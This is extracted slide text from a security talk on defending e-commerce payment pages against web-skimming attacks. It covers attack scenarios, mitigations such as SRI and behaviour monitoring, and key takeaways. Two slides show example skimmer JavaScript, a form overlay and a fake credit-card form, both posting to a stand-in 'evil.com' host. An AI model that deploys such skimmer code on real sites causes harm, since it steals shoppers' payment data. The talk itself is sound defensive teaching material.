Document Comparison

Securing Different Types of Payment Pages from E-commerce Skimming Attacks Pedro Fortuna Jscrambler CTO & Co-Founder BoA @ PCI SSC 20+ years working in Security 13+ years defending websites from integrity attacks Several patents in AppSec Pedro Fortuna Some of my talks OWASP AppSec Israel 2023 BSides San Francisco 2018, 2022, 2023 OWASP AppSec USA 2017, 2021 OWASP 20th Anniversary Conf 2021 OWASP Global AppSec Tel Aviv 2019 BSides Washington 2018 DEFCON PHV 2018 BSides Austin 2018 OWASP AppSec EU 2018 SecAppDev 2018, Leuven 2018 BSides Lisbon 2017, 2018, 2021, 2022, 2023 OWASP AppSec California 2017

• All payment pages aren’t built the same way

• Different types of E-Skimming attack scenarios

• Key takeaways What is E-Skimming?

Compromises a third- party component Payment Information is sent to attacker Compromises target website via vulnerabilities or misconfigurations Website is compromised Performs a supply chain attack via the compromised third-party JavaScript Web Skimmer steals payment information …

Detect and block * Vendor needs to be monitoring event hijacking and/or access to Scenario 2 Form Overlay Form Overlay The payment page compromised.js const legit = document.getElementById(“legit-form”); const coordinates = legit.getBoundingClientRect(); const overlay = document.createElement(‘form'); document.body.appendChild(overlay); overlay.style.setProperty('position', 'absolute’); overlay.setAttribute(“action”, “https://evil.com”); overlay.style.setProperty('z-index', '30'); overlay.style.setProperty('width', `${coordinates.width}px`); overlay.style.setProperty('height', `${coordinates.height}px`); overlay.style.setProperty(top', `${coordinates.height}px`); overlay.style.setProperty(‘left', `${coordinates.height}px`); overlay.style.setProperty(‘right', `${coordinates.height}px`); overlay.style.setProperty(‘bottom', `${coordinates.height}px`); Form Overlay Mitigation SRI can in theory prevent a modified script to run, but unpracticable due to third parties being updated all the It can potentially detect the malicious code.

Detect and block * Vendor needs to be monitoring form related behaviors including access to forms Scenario 3 A page before the payment page compromised.js var fake_form = document.createElement(“fake-form”); fake_form.setAttribute(“action”, “https://evil.com”); var field1 = document.createElement(“input”); field1.setAttribute(“name”, “credit-card”); /* … add a bunch of fake form fields … */ document.querySelector(“body”).appendChild(fake_form); Fake Form Mitigation SRI can in theory prevent a modified script to run, but unpracticable due to third parties being updated all the It can potentially detect the fake form and/or the malicious code.

• eSkimming attacks are going beyond simple skimming of the payment form

• The parent page or even other pages can also be targeted

• Securing payment data properly requires more than controlling where websites load code from and what domains they send data to

• For example, controlling forms and iframes behaviors are just as important

• Securing payments scales better by monitoring new behaviors and authorizing them

• Beware the danger of Script Usurpation, as it can help bypass monitoring policies Key Takeaways Thank you!